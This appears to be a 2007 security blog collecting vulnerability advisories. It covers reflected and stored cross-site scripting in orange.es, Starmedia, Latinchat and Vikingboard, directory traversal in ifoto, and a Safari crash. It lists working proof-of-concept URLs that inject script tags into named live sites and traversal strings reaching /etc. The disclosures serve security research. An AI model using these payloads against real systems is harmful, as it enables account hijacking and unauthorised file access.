Orange.es Starmedia y latinchat vulnerables

Monday, August 06, 2007
#################################################
Orange.es Starmedia y latinchat vulnerables a
ataques de tipo Cross-site Scripting.
Articulo original:http://lostmon.blogspot.com/
2007/08/orangees-starmedia-y-latinchat.html
#################################################

Hace varios dias que intente ponerme en contacto
con el webmaster tanto de starmedia ,orange para
notificarles una serie de vulnerabilidades en sus
paginas.Hasta tres correos en diferentes fechas sin
Obtener ninguna respuesta por parte del grupo.

Estas paginas , estan afectadas por una vulnerabilidad
llamada Cross site scripting,Atraves de la cual se puede
ejecutar codigo html o javascript en el contexto de seguridad
entre el servidor y el usuario cliente.

Asi pues si visitais estas paginas y usais sus servicios
ir con cuidado y comprobar las URL que visitais de las mismas
y que no haya nada extraño en ellas.


###################################
Sobre el dominio:*.orange.es
###################################

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado"><script>
alert()</script>&xargs=&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen"><script>alert()</script>
&filtrofamiliar=Desactivado&xargs="&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=">
<script>alert()</script>&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=
"><script>alert()</script>

http://busca.orange.es/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=


http://busca.orange.es/search?buscar=todo+spice+girls
&first=&rbpref=pref&destino=web&filtrofamiliar=Activado
"><script>alert()</script>&xargs=&estat=

Todas las variables de la siguiente url estan afectadas
menos la y , la x , la rbpref y slanguage.


http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&
iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&
inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers
=&slanguage=&rbpref=advanced&lang=&x=44&y=13

http://cine.orange.es/buscador/contenidos.html?&text=
%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E

http://cine.orange.es/encuestas/encuestas.html?id=3801
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/buscarForos?query=
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385&re="><script>alert()</script>

http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385"><script>alert()</script>&re=blah


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415
"><script>alert()</script> // sin estar logeado.

http://tonosdeespera.orange.es/RingBackTones/servlet/web/
TonosCategoria?identificador=5117154&TitCat=Pop+Rock+
Internacional"><script>alert()</script>

http://personales.orange.es/orange/site/siteBuscador?
palabras="><script>alert()</script>
&idcategoria=#busquedas


###################################
En sus Chats.
###################################

se puede llamar a una ventana de privado sin estar en el chat:
y ademas el parametro username de usuario al que abrimos el
privado es tambien vulnerable:

http://disp011-org.orange.es/magma_qa/templates/T12/
0/privat.html?
UserName=Lostmon"><script>alert()</script>

http://dhtml.orange.es/magma_qa/templates/T12/R0/
showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&
InstanceID=R32_7-1&UserName=Lostmon

ademas las cajas para introducir texto para enviar al canal o
la caja de mensage a enviar en el privado tambien permite el
envio de codigo XSS esperimentando,con los chats , tal vez
sea asi mismo posible enviar codigo XSS a los demas usuarios
( no lo he probado)


############################
Starmedia
##########################

como puede verse en la siguiente url , el caso es el mismo
que en el dominio orange.es.

La estructura web sigue el mismo patron
con lo cual podemos pensar que es el mismo tipo de sistema

y posee las mismas vulnerabilidades ( y asi es ).

http://busca.starmedia.com/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=

tabien esta afectado de la misma manera y al ser el mismo tipo de
sistema en el chat (latinchat)
tambien posee las mismas vulnerabilidades.



http://login04.latinchat.com/magma_qa/templates/modules/
result/T2.php?UserName=Lostmon"><script>
alert()</script>&InstanceID=R31_1-1

##################### €nd ##############################

Thnxs To estrella to be my ligth
Thnx to all Lostmon team !

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Crashing Safari 3.0.3 for Windows Step by Step

Friday, August 03, 2007
A few days a go i Publish in my blog ,a guide ,
about how to crash safari 3.0.2 step by step.


http://lostmon.blogspot.com/2007/07/
crashing-safari-302-for-windows-step-by.html


Apple prevent to fix in the next version or release, but today i test
safari for windows 3.0.3 and this flaw
continue exist in this version too :((

Other crash could be done wen try to print any document ,in safari 3.0.3

--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)


--
La curiosidad es lo que hace mover la mente....

ifoto traversal folder enumeration

Wednesday, July 25, 2007
#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisore:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify:no exploit include:yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################


ifoto contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'dir' variable upon submission
to 'index.php' scripts.This could allow a remote users to
create a specially crafted URL that would execute '../'
directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../


################# €nd ############################


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Vikingboard multiple Cross site scripting

#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################


Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007


#####################
Examples
#####################


http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]

http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]


we can call the debug parameter to obtain sensitive information.


http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0

wen send a private message the field "Message Title " is affected

http://localhost/viking/cp.php?mode=6

we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel

http://localhost/viking/cp.php?mode=7&f=1

http://localhost/viking/report.php?p=2[XSS-CODE]


http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]

http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]

http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]

http://localhost/viking/search.php?search=user:administrator&act=dosearch

if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed

##################### €nd ##############################

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends